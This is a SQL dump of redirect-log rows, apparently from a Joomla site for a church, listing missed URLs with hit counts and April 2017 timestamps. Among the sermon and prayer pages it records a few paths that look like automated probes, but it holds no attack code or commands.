(4616, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/jquery.magnific-popup.min.js', NULL, '', '', 1, 0, '2017-04-01 22:00:55', '0000-00-00 00:00:00', 301),
(4617, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/widgetkit-9d733cf1.css', NULL, '', '', 1, 0, '2017-04-01 22:00:55', '0000-00-00 00:00:00', 301),
(4618, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/plusone.js', NULL, '', '', 1, 0, '2017-04-01 22:00:55', '0000-00-00 00:00:00', 301),
(4619, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/bootstrap.css', NULL, '', '', 1, 0, '2017-04-01 22:00:55', '0000-00-00 00:00:00', 301),
(4620, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/jquery.min.js', NULL, '', '', 1, 0, '2017-04-01 22:00:55', '0000-00-00 00:00:00', 301),
(4621, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/jquery-noconflict.js', NULL, '', '', 1, 0, '2017-04-01 22:00:55', '0000-00-00 00:00:00', 301),
(4622, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/mailchimpsignup.css', NULL, '', '', 1, 0, '2017-04-01 22:00:55', '0000-00-00 00:00:00', 301),
(4623, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/jquery-migrate.min.js', NULL, '', '', 1, 0, '2017-04-01 22:00:56', '0000-00-00 00:00:00', 301),
(4624, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/widgetkit-5b3cd5cc.js', NULL, '', '', 1, 0, '2017-04-01 22:00:56', '0000-00-00 00:00:00', 301),
(4625, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/mootools-more.js', NULL, '', '', 1, 0, '2017-04-01 22:00:56', '0000-00-00 00:00:00', 301),
(4626, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/mailchimpsignup.js', NULL, '', '', 1, 0, '2017-04-01 22:00:56', '0000-00-00 00:00:00', 301),
(4627, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/mootools-core.js', NULL, '', '', 1, 0, '2017-04-01 22:00:56', '0000-00-00 00:00:00', 301),
(4628, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/uikit(1).css', NULL, '', '', 1, 0, '2017-04-01 22:00:56', '0000-00-00 00:00:00', 301),
(4629, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/bootstrap.min.js', NULL, '', '', 1, 0, '2017-04-01 22:00:56', '0000-00-00 00:00:00', 301),
(4630, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/extensions.css', NULL, '', '', 1, 0, '2017-04-01 22:00:56', '0000-00-00 00:00:00', 301),
(4631, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/core.js', NULL, '', '', 1, 0, '2017-04-01 22:00:56', '0000-00-00 00:00:00', 301),
(4632, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/base(1).css', NULL, '', '', 1, 0, '2017-04-01 22:00:56', '0000-00-00 00:00:00', 301),
(4633, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/tools(1).css', NULL, '', '', 1, 0, '2017-04-01 22:00:56', '0000-00-00 00:00:00', 301),
(4634, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/layout(2).css', NULL, '', '', 1, 0, '2017-04-01 22:00:57', '0000-00-00 00:00:00', 301),
(4635, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/menus(1).css', NULL, '', '', 1, 0, '2017-04-01 22:00:57', '0000-00-00 00:00:00', 301),
(4636, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/modules(1).css', NULL, '', '', 1, 0, '2017-04-01 22:00:57', '0000-00-00 00:00:00', 301),
(4637, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/k2.css', NULL, '', '', 1, 0, '2017-04-01 22:00:57', '0000-00-00 00:00:00', 301),
(4638, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/system(2).css', NULL, '', '', 1, 0, '2017-04-01 22:00:57', '0000-00-00 00:00:00', 301),
(4639, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/varelaround(1).css', NULL, '', '', 1, 0, '2017-04-01 22:00:57', '0000-00-00 00:00:00', 301),
(4640, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/varelaround.css', NULL, '', '', 1, 0, '2017-04-01 22:00:57', '0000-00-00 00:00:00', 301),
(4641, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/patuaone.css', NULL, '', '', 1, 0, '2017-04-01 22:00:57', '0000-00-00 00:00:00', 301),
(4642, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/style.css', NULL, '', '', 1, 0, '2017-04-01 22:00:57', '0000-00-00 00:00:00', 301),
(4643, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/responsive(1).css', NULL, '', '', 1, 0, '2017-04-01 22:00:57', '0000-00-00 00:00:00', 301),
(4644, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/warp.js', NULL, '', '', 1, 0, '2017-04-01 22:00:58', '0000-00-00 00:00:00', 301),
(4645, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/accordionmenu.js', NULL, '', '', 1, 0, '2017-04-01 22:00:58', '0000-00-00 00:00:00', 301),
(4646, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/custom.css', NULL, '', '', 1, 0, '2017-04-01 22:00:58', '0000-00-00 00:00:00', 301),
(4647, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/template.js', NULL, '', '', 1, 0, '2017-04-01 22:00:58', '0000-00-00 00:00:00', 301),
(4648, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/print(1).css', NULL, '', '', 1, 0, '2017-04-01 22:00:58', '0000-00-00 00:00:00', 301),
(4649, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/button.ea31e9a5ca2c3a1514ec1ed6530e2669.js', NULL, '', '', 1, 0, '2017-04-01 22:00:58', '0000-00-00 00:00:00', 301),
(4650, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/uikit.min.js', NULL, '', '', 1, 0, '2017-04-01 22:00:58', '0000-00-00 00:00:00', 301),
(4651, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/responsive.js', NULL, '', '', 1, 0, '2017-04-01 22:00:58', '0000-00-00 00:00:00', 301),
(4652, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/dropdownmenu.js', NULL, '', '', 1, 0, '2017-04-01 22:00:58', '0000-00-00 00:00:00', 301),
(4653, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/search.js', NULL, '', '', 1, 0, '2017-04-01 22:00:58', '0000-00-00 00:00:00', 301),
(4654, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/widgets.js', NULL, '', '', 1, 0, '2017-04-01 22:00:59', '0000-00-00 00:00:00', 301),
(4655, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/6.png', NULL, '', '', 1, 0, '2017-04-01 22:00:59', '0000-00-00 00:00:00', 301),
(4656, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/logo-1.png', NULL, '', '', 1, 0, '2017-04-01 22:00:59', '0000-00-00 00:00:00', 301),
(4657, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/ajax-loader.gif', NULL, '', '', 1, 0, '2017-04-01 22:00:59', '0000-00-00 00:00:00', 301),
(4658, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/small_logo.png', NULL, '', '', 1, 0, '2017-04-01 22:00:59', '0000-00-00 00:00:00', 301),
(4659, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/f710044bf79a4b1f5d8b085e5e5d9711_L.jpg', NULL, '', '', 1, 0, '2017-04-01 22:00:59', '0000-00-00 00:00:00', 301),
(4660, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/Scriptural Prayers for your Husband_files/0', NULL, '', '', 1, 0, '2017-04-01 22:01:00', '0000-00-00 00:00:00', 301),
(4661, 'http://www.lifeoasisinternationalchurch.org/get.php', NULL, 'http://www.lifeoasisinternationalchurch.org/get.php', '', 1, 0, '2017-04-01 22:17:27', '0000-00-00 00:00:00', 301),
(4662, 'http://lifeoasisinternationalchurch.org/modules/mod_vina_youtube_channel/assets/css/css-6e0db73e6add40ed602d26aa773d1c72.php', NULL, 'http://lifeoasisinternationalchurch.org/featured-messages/2-uncategorised/47-videos', '', 1, 0, '2017-04-01 23:39:00', '0000-00-00 00:00:00', 301),
(4663, 'http://www.lifeoasisinternationalchurch.org//index.php?option=com_easyblog&view=dashboard&layout=write', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 3, 0, '2017-04-02 02:33:33', '0000-00-00 00:00:00', 301),
(4664, 'http://www.lifeoasisinternationalchurch.org//index.php/component/users/?view=registration', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 4, 0, '2017-04-02 02:33:38', '0000-00-00 00:00:00', 301),
(4665, 'http://www.lifeoasisinternationalchurch.org//index.php?option=com_user&view=register', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php/component/users/?view=registration', '', 2, 0, '2017-04-02 02:33:39', '0000-00-00 00:00:00', 301),
(4666, 'http://lifeoasisinternationalchurch.org/tmp/krd.php', NULL, '', '', 2, 0, '2017-04-02 02:51:39', '0000-00-00 00:00:00', 301),
(4667, 'http://www.lifeoasisinternationalchurch.org/prayer.html', NULL, '', '', 1, 0, '2017-04-02 04:01:50', '0000-00-00 00:00:00', 301),
(4668, 'http://lifeoasisinternationalchurch.org/resources/father-s-heart/18-loic/50-young-achievers?page&print=1&tmpl=component', NULL, '', '', 1, 0, '2017-04-02 07:50:37', '0000-00-00 00:00:00', 301),
(4669, 'http://lifeoasisinternationalchurch.org/template-info/music-2', NULL, '', '', 1, 0, '2017-04-02 07:54:48', '0000-00-00 00:00:00', 301),
(4670, 'https://lifeoasisinternationalchurch.org/ljmti/home/practical-section', NULL, '', '', 2, 0, '2017-04-02 07:55:34', '0000-00-00 00:00:00', 301),
(4671, 'http://lifeoasisinternationalchurch.org/get.php', NULL, 'http://lifeoasisinternationalchurch.org/get.php', '', 1, 0, '2017-04-02 08:41:18', '0000-00-00 00:00:00', 301),
(4672, 'http://www.lifeoasisinternationalchurch.org/prayer/136-20148', NULL, '', '', 1, 0, '2017-04-02 13:48:12', '0000-00-00 00:00:00', 301),
(4673, 'http://lifeoasisinternationalchurch.org/gobcwel.html', NULL, '', '', 1, 0, '2017-04-02 21:34:40', '0000-00-00 00:00:00', 301),
(4674, 'http://www.lifeoasisinternationalchurch.org/trainin', NULL, '', '', 4, 0, '2017-04-02 21:47:33', '0000-00-00 00:00:00', 301),
(4675, 'http://www.lifeoasisinternationalchurch.org/traini', NULL, '', '', 4, 0, '2017-04-02 21:47:33', '0000-00-00 00:00:00', 301),
(4676, 'http://www.lifeoasisinternationalchurch.org/train', NULL, '', '', 5, 0, '2017-04-02 21:47:33', '0000-00-00 00:00:00', 301),
(4677, 'http://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/50-prayer-a-fasting-day-40', NULL, '', '', 2, 0, '2017-04-03 06:51:48', '0000-00-00 00:00:00', 301),
(4678, 'https://www.spiritmeat.net/about-us/bible-reading', NULL, '', '', 1, 0, '2017-04-03 08:55:22', '0000-00-00 00:00:00', 301),
(4679, 'https://www.spiritmeat.net/event/asom', NULL, '', '', 1, 0, '2017-04-03 08:56:06', '0000-00-00 00:00:00', 301),
(4680, 'http://lifeoasisinternationalchurch.org/bin/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/bin/logo_img.php', '', 4, 0, '2017-04-03 11:55:43', '0000-00-00 00:00:00', 301),
(4681, 'https://lifeoasisinternationalchurch.org/resources/youtube-live', NULL, '', '', 44, 0, '2017-04-03 17:01:47', '0000-00-00 00:00:00', 301),
(4682, 'http://www.lifeoasisinternationalchurch.org/resources/streaming-registered/profile', NULL, '', '', 1, 0, '2017-04-03 20:55:09', '0000-00-00 00:00:00', 301),
(4683, 'http://lifeoasisinternationalchurch.org/index.php?option=com_opencart', NULL, '', '', 1, 0, '2017-04-03 21:08:02', '0000-00-00 00:00:00', 301),
(4684, 'http://lifeoasisinternationalchurch.org/error_message.php?error=cant_open_file', NULL, '', '', 1, 0, '2017-04-04 04:34:46', '0000-00-00 00:00:00', 301),
(4685, 'http://lifeoasisinternationalchurch.org/whmcs/submitticket.php', NULL, '', '', 1, 0, '2017-04-04 04:34:48', '0000-00-00 00:00:00', 301),
(4686, 'http://lifeoasisinternationalchurch.org/submitticket.php', NULL, '', '', 1, 0, '2017-04-04 04:34:49', '0000-00-00 00:00:00', 301),
(4687, 'http://lifeoasisinternationalchurch.org/language/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/language/logo_img.php', '', 2, 0, '2017-04-04 07:56:16', '0000-00-00 00:00:00', 301),
(4688, 'http://lifeoasisinternationalchurch.org/layouts/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/layouts/logo_img.php', '', 2, 0, '2017-04-04 07:56:17', '0000-00-00 00:00:00', 301),
(4689, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_extrawatch&origin=frontend&ewToken=5176d8a343588ee4e4f5c715a01c74d6913f49a5&task=ajax&action=img&rand=0.30536363271229316&env=ExtraWatchJoomlaEnv&ref=http%3A_SLASH_%2Fwww.lifeoasisinternationalchurch.org%2F&title=LIVE STREAMING - Dream Centre of the Life Oasis Int\'l Church&uri=_SLASH_streaming&referringQuery=&getParams=', NULL, 'http://www.lifeoasisinternationalchurch.org/streaming', '', 1, 0, '2017-04-04 15:00:17', '0000-00-00 00:00:00', 301),
(4690, 'http://lifeoasisinternationalchurch.org/ private/streaming', NULL, '', '', 2, 0, '2017-04-04 15:31:58', '0000-00-00 00:00:00', 301),
(4691, 'http://lifeoasisinternationalchurch.org/priva/live-streaming', NULL, '', '', 22, 0, '2017-04-04 15:34:40', '0000-00-00 00:00:00', 301),
(4692, 'http://lifeoasisinternationalchurch.org/private/streaming', NULL, '', '', 4, 0, '2017-04-04 15:37:18', '0000-00-00 00:00:00', 301),
(4693, 'http://www.lifeoasisinternationalchurch.org/steward', NULL, '', '', 7, 0, '2017-04-04 15:40:19', '0000-00-00 00:00:00', 301),
(4694, 'http://www.lifeoasisinternationalchurch.org/stewards', NULL, '', '', 7, 0, '2017-04-04 15:42:06', '0000-00-00 00:00:00', 301),
(4695, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_extrawatch&origin=frontend&ewToken=5176d8a343588ee4e4f5c715a01c74d6913f49a5&task=ajax&action=img&rand=0.2933180184568882&env=ExtraWatchJoomlaEnv&ref=&title=The Dream Centre of the Life Oasis Int\'l Church - Dream Centre of the Life Oasis Int\'l Church&uri=_SLASH_&referringQuery=&getParams=', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 1, 0, '2017-04-04 15:43:28', '0000-00-00 00:00:00', 301),
(4696, 'http://lifeoasisinternationalchurch.org/private-streamin', NULL, '', '', 2, 0, '2017-04-04 16:26:52', '0000-00-00 00:00:00', 301),
(4697, 'https://www.lifeoasisinternationalchurch.org/private-', NULL, '', '', 2, 0, '2017-04-04 17:42:55', '0000-00-00 00:00:00', 301),
(4698, 'http://lifeoasisinternationalchurch.org/vb/', NULL, '', '', 2, 0, '2017-04-04 19:47:39', '0000-00-00 00:00:00', 301),
(4699, 'http://www.lifeoasisinternationalchurch.org/ministries/ljmti/14-contact-us', NULL, '', '', 1, 0, '2017-04-05 04:29:31', '0000-00-00 00:00:00', 301),
(4700, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermon/18-army-of-the-lord-1', NULL, '', '', 8, 0, '2017-04-05 16:06:52', '0000-00-00 00:00:00', 301),
(4701, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermons/0/0?start=20', NULL, '', '', 15, 0, '2017-04-05 16:21:23', '0000-00-00 00:00:00', 301),
(4702, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/30-prophetic-words-for-day-21', NULL, '', '', 15, 0, '2017-04-05 16:30:30', '0000-00-00 00:00:00', 301),
(4703, 'https://lifeoasisinternationalchurch.org/2-uncategorised/60-destinytv', NULL, '', '', 10, 0, '2017-04-05 16:33:54', '0000-00-00 00:00:00', 301),
(4704, 'https://lifeoasisinternationalchurch.org/index.php/134-prayer-focus-for-day-9', NULL, '', '', 13, 0, '2017-04-05 16:37:37', '0000-00-00 00:00:00', 301),
(4705, 'https://lifeoasisinternationalchurch.org/index.php/217-2015-day-40', NULL, '', '', 9, 0, '2017-04-05 16:41:05', '0000-00-00 00:00:00', 301),
(4706, 'https://lifeoasisinternationalchurch.org/index.php/240-2016-day-23', NULL, '', '', 28, 0, '2017-04-05 16:43:20', '0000-00-00 00:00:00', 301),
(4707, 'https://lifeoasisinternationalchurch.org/index.php/227-2016-day-10', NULL, '', '', 15, 0, '2017-04-05 16:45:21', '0000-00-00 00:00:00', 301),
(4708, 'https://lifeoasisinternationalchurch.org/index.php/232-2016-day-15', NULL, '', '', 9, 0, '2017-04-05 16:47:04', '0000-00-00 00:00:00', 301),
(4709, 'https://lifeoasisinternationalchurch.org/index.php/237-2016-day-20', NULL, '', '', 15, 0, '2017-04-05 16:47:38', '0000-00-00 00:00:00', 301),
(4710, 'https://lifeoasisinternationalchurch.org/index.php/241-2016-day-24', NULL, '', '', 16, 0, '2017-04-05 16:48:11', '0000-00-00 00:00:00', 301),
(4711, 'https://lifeoasisinternationalchurch.org/index.php/235-2016-day-18', NULL, '', '', 22, 0, '2017-04-05 16:50:03', '0000-00-00 00:00:00', 301),
(4712, 'https://lifeoasisinternationalchurch.org/index.php/225-2016-day-8', NULL, '', '', 24, 0, '2017-04-05 16:53:32', '0000-00-00 00:00:00', 301),
(4713, 'https://lifeoasisinternationalchurch.org/index.php/220-2016-day-3', NULL, '', '', 21, 0, '2017-04-05 16:56:47', '0000-00-00 00:00:00', 301),
(4714, 'https://lifeoasisinternationalchurch.org/ministries/ljmti', NULL, '', '', 9, 0, '2017-04-05 16:58:25', '0000-00-00 00:00:00', 301),
(4715, 'https://lifeoasisinternationalchurch.org/index.php/157-day3', NULL, '', '', 11, 0, '2017-04-05 17:00:05', '0000-00-00 00:00:00', 301),
(4716, 'https://lifeoasisinternationalchurch.org/index.php/64-prayer-focus-for-day-11', NULL, '', '', 9, 0, '2017-04-05 17:11:34', '0000-00-00 00:00:00', 301),
(4717, 'https://lifeoasisinternationalchurch.org/index.php/139-day-13', NULL, '', '', 12, 0, '2017-04-05 17:39:23', '0000-00-00 00:00:00', 301),
(4718, 'https://lifeoasisinternationalchurch.org/index.php/162-day-34', NULL, '', '', 10, 0, '2017-04-05 17:39:52', '0000-00-00 00:00:00', 301),
(4719, 'https://lifeoasisinternationalchurch.org/index.php/165-day-37', NULL, '', '', 13, 0, '2017-04-05 17:40:14', '0000-00-00 00:00:00', 301),
(4720, 'https://lifeoasisinternationalchurch.org/index.php/133-2014-8', NULL, '', '', 9, 0, '2017-04-05 17:40:48', '0000-00-00 00:00:00', 301),
(4721, 'https://lifeoasisinternationalchurch.org/index.php/152-day-25', NULL, '', '', 8, 0, '2017-04-05 17:43:29', '0000-00-00 00:00:00', 301),
(4722, 'https://lifeoasisinternationalchurch.org/index.php/159-day-31', NULL, '', '', 13, 0, '2017-04-05 17:47:14', '0000-00-00 00:00:00', 301),
(4723, 'https://lifeoasisinternationalchurch.org/index.php/170-prophetic-words-for-day-6', NULL, '', '', 13, 0, '2017-04-05 17:50:03', '0000-00-00 00:00:00', 301),
(4724, 'https://lifeoasisinternationalchurch.org/index.php/168-prophetic-words-for-day-4', NULL, '', '', 13, 0, '2017-04-05 17:53:04', '0000-00-00 00:00:00', 301),
(4725, 'https://lifeoasisinternationalchurch.org/index.php/197-2015-day-22', NULL, '', '', 8, 0, '2017-04-05 18:02:01', '0000-00-00 00:00:00', 301),
(4726, 'https://lifeoasisinternationalchurch.org/index.php/201-2015-day-26', NULL, '', '', 8, 0, '2017-04-05 18:05:22', '0000-00-00 00:00:00', 301),
(4727, 'http://www.lifeoasisinternationalchurch.org/streoaming', NULL, '', '', 1, 0, '2017-04-05 18:06:26', '0000-00-00 00:00:00', 301),
(4728, 'https://lifeoasisinternationalchurch.org/index.php/213-2015-day-39', NULL, '', '', 11, 0, '2017-04-05 18:07:29', '0000-00-00 00:00:00', 301),
(4729, 'https://lifeoasisinternationalchurch.org/index.php/206-2015-day-32', NULL, '', '', 13, 0, '2017-04-05 18:09:49', '0000-00-00 00:00:00', 301),
(4730, 'https://lifeoasisinternationalchurch.org/index.php/188-2015-day-11', NULL, '', '', 9, 0, '2017-04-05 18:12:50', '0000-00-00 00:00:00', 301),
(4731, 'https://lifeoasisinternationalchurch.org/index.php/212-2015-day-38', NULL, '', '', 8, 0, '2017-04-05 18:15:23', '0000-00-00 00:00:00', 301),
(4732, 'https://lifeoasisinternationalchurch.org/index.php/193-2015-day-17', NULL, '', '', 9, 0, '2017-04-05 18:18:16', '0000-00-00 00:00:00', 301),
(4733, 'https://lifeoasisinternationalchurch.org/index.php/184-2015-day-8', NULL, '', '', 7, 0, '2017-04-05 18:23:52', '0000-00-00 00:00:00', 301),
(4734, 'https://lifeoasisinternationalchurch.org/index.php/182-2015-day-6', NULL, '', '', 13, 0, '2017-04-05 18:35:24', '0000-00-00 00:00:00', 301),
(4735, 'https://lifeoasisinternationalchurch.org/index.php/258-day-9-of-21-days-fasting-and-prayer-october', NULL, '', '', 18, 0, '2017-04-05 18:40:15', '0000-00-00 00:00:00', 301),
(4736, 'https://lifeoasisinternationalchurch.org/index.php/104-prayerfocus31', NULL, '', '', 14, 0, '2017-04-05 18:41:40', '0000-00-00 00:00:00', 301),
(4737, 'https://lifeoasisinternationalchurch.org/index.php/243-day-5-of-21-days-fasting-and-prayer-october', NULL, '', '', 15, 0, '2017-04-05 18:43:51', '0000-00-00 00:00:00', 301),
(4738, 'https://lifeoasisinternationalchurch.org/index.php/244-day-6-of-21-days-fasting-and-prayer-october', NULL, '', '', 14, 0, '2017-04-05 18:44:44', '0000-00-00 00:00:00', 301),
(4739, 'https://lifeoasisinternationalchurch.org/index.php/276-day-16-of-21-days-fasting-and-prayer-november', NULL, '', '', 25, 0, '2017-04-05 18:46:16', '0000-00-00 00:00:00', 301),
(4740, 'https://lifeoasisinternationalchurch.org/index.php/guidelines', NULL, '', '', 8, 0, '2017-04-05 18:47:21', '0000-00-00 00:00:00', 301),
(4741, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/35-prayer-a-fasting-day-26', NULL, '', '', 12, 0, '2017-04-05 18:47:38', '0000-00-00 00:00:00', 301),
(4742, 'https://lifeoasisinternationalchurch.org/index.php/245-day-6-of-21-days-fasting-and-prayer-october-2', NULL, '', '', 17, 0, '2017-04-05 18:50:46', '0000-00-00 00:00:00', 301),
(4743, 'https://lifeoasisinternationalchurch.org/index.php/266-day-6-of-21-days-fasting-and-prayer-november', NULL, '', '', 26, 0, '2017-04-05 18:53:16', '0000-00-00 00:00:00', 301),
(4744, 'https://lifeoasisinternationalchurch.org/index.php/260-day-22-of-22-days-fasting-and-prayer-october-2', NULL, '', '', 18, 0, '2017-04-05 18:57:39', '0000-00-00 00:00:00', 301),
(4745, 'https://lifeoasisinternationalchurch.org/resources/father-s-heart', NULL, '', '', 37, 0, '2017-04-05 19:01:44', '0000-00-00 00:00:00', 301),
(4746, 'https://lifeoasisinternationalchurch.org/loic/aboutus.php', NULL, '', '', 12, 0, '2017-04-05 19:06:25', '0000-00-00 00:00:00', 301),
(4747, 'https://lifeoasisinternationalchurch.org/loic/mediaoutreach.php', NULL, '', '', 3, 0, '2017-04-05 19:08:41', '0000-00-00 00:00:00', 301),
(4748, 'https://lifeoasisinternationalchurch.org/resources/streaming-registered', NULL, '', '', 21, 0, '2017-04-05 19:14:50', '0000-00-00 00:00:00', 301),
(4749, 'https://lifeoasisinternationalchurch.org/ministries/wimmp', NULL, '', '', 20, 0, '2017-04-05 19:17:26', '0000-00-00 00:00:00', 301),
(4750, 'https://lifeoasisinternationalchurch.org/payment', NULL, '', '', 70, 0, '2017-04-05 19:19:48', '0000-00-00 00:00:00', 301),
(4751, 'https://lifeoasisinternationalchurch.org/about-us/our-service-schedule', NULL, '', '', 19, 0, '2017-04-05 19:23:51', '0000-00-00 00:00:00', 301),
(4752, 'https://lifeoasisinternationalchurch.org/about-us/the-church-2', NULL, '', '', 24, 0, '2017-04-05 19:27:16', '0000-00-00 00:00:00', 301),
(4753, 'https://lifeoasisinternationalchurch.org/about-us/rev-oyenike-areogun', NULL, '', '', 44, 0, '2017-04-05 19:31:00', '0000-00-00 00:00:00', 301),
(4754, 'https://lifeoasisinternationalchurch.org/index.php/158-day-30', NULL, '', '', 12, 0, '2017-04-05 19:37:16', '0000-00-00 00:00:00', 301),
(4755, 'https://lifeoasisinternationalchurch.org/index.php/209-2015-day-35', NULL, '', '', 13, 0, '2017-04-05 19:41:28', '0000-00-00 00:00:00', 301),
(4756, 'https://lifeoasisinternationalchurch.org/index.php/263-day-3-of-21-days-fasting-and-prayer-november', NULL, '', '', 17, 0, '2017-04-05 19:43:32', '0000-00-00 00:00:00', 301),
(4757, 'http://www.lifeoasisinternationalchurch.org/youtube/private', NULL, '', '', 5, 0, '2017-04-05 22:25:35', '0000-00-00 00:00:00', 301),
(4758, 'http://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/lastdays', NULL, 'http://google.com', '', 1, 0, '2017-04-06 02:52:19', '0000-00-00 00:00:00', 301),
(4759, 'http://www.lifeoasisinternationalchurch.org/plugins/system/popup_anywhere/css/css-53c2b4d4f2c4d74906699d27d3553b04.php', NULL, 'http://www.lifeoasisinternationalchurch.org/streaming', '', 2, 0, '2017-04-06 04:59:45', '0000-00-00 00:00:00', 301),
(4760, 'http://www.lifeoasisinternationalchurch.org/|', NULL, '', '', 2, 0, '2017-04-06 11:45:45', '0000-00-00 00:00:00', 301),
(4761, 'http://lifeoasisinternationalchurch.org/str/', NULL, '', '', 1, 0, '2017-04-06 19:39:13', '0000-00-00 00:00:00', 301),
(4762, 'http://lifeoasisinternationalchurch.org/testimonies/day.listevents/2012/08/09/15', NULL, '', '', 2, 0, '2017-04-07 03:56:45', '0000-00-00 00:00:00', 301),
(4763, 'https://lifeoasisinternationalchurch.org/prayer/prayer/7-kindom-builder/33-prayer-a-fasting-day-24', NULL, '', '', 1, 0, '2017-04-07 10:52:22', '0000-00-00 00:00:00', 301),
(4764, 'http://www.lifeoasisinternationalchurch.org/private-stream/iing', NULL, '', '', 1, 0, '2017-04-07 16:08:53', '0000-00-00 00:00:00', 301),
(4765, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/10-grace-2', NULL, '', '', 3, 0, '2017-04-07 20:32:19', '0000-00-00 00:00:00', 301),
(4766, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/8-enemies-of-gods-word-2', NULL, '', '', 7, 0, '2017-04-07 20:41:56', '0000-00-00 00:00:00', 301),
(4767, 'http://lifeoasisinternationalchurch.org/11-demo-articles/11-about-joomla', NULL, '', '', 1, 0, '2017-04-07 20:42:10', '0000-00-00 00:00:00', 301),
(4768, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/11-grace-3', NULL, '', '', 9, 0, '2017-04-07 20:42:59', '0000-00-00 00:00:00', 301),
(4769, 'http://lifeoasisinternationalchurch.org/2011-08-10-21-22-58/11-ministries', NULL, '', '', 10, 0, '2017-04-07 20:43:03', '0000-00-00 00:00:00', 301),
(4770, 'https://lifeoasisinternationalchurch.org/loic/articles.php', NULL, '', '', 5, 0, '2017-04-07 21:18:00', '0000-00-00 00:00:00', 301),
(4771, 'http://www.lifeoasisinternationalchurch.org/daughters of destiny', NULL, '', '', 2, 0, '2017-04-07 22:29:41', '0000-00-00 00:00:00', 301),
(4772, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/5-dark-side-of-the-anointing-3', NULL, '', '', 9, 0, '2017-04-08 00:08:44', '0000-00-00 00:00:00', 301),
(4773, 'http://lifeoasisinternationalchurch.org/2011-08-10-21-22-58/8-newsflash', NULL, '', '', 2, 0, '2017-04-08 00:13:38', '0000-00-00 00:00:00', 301),
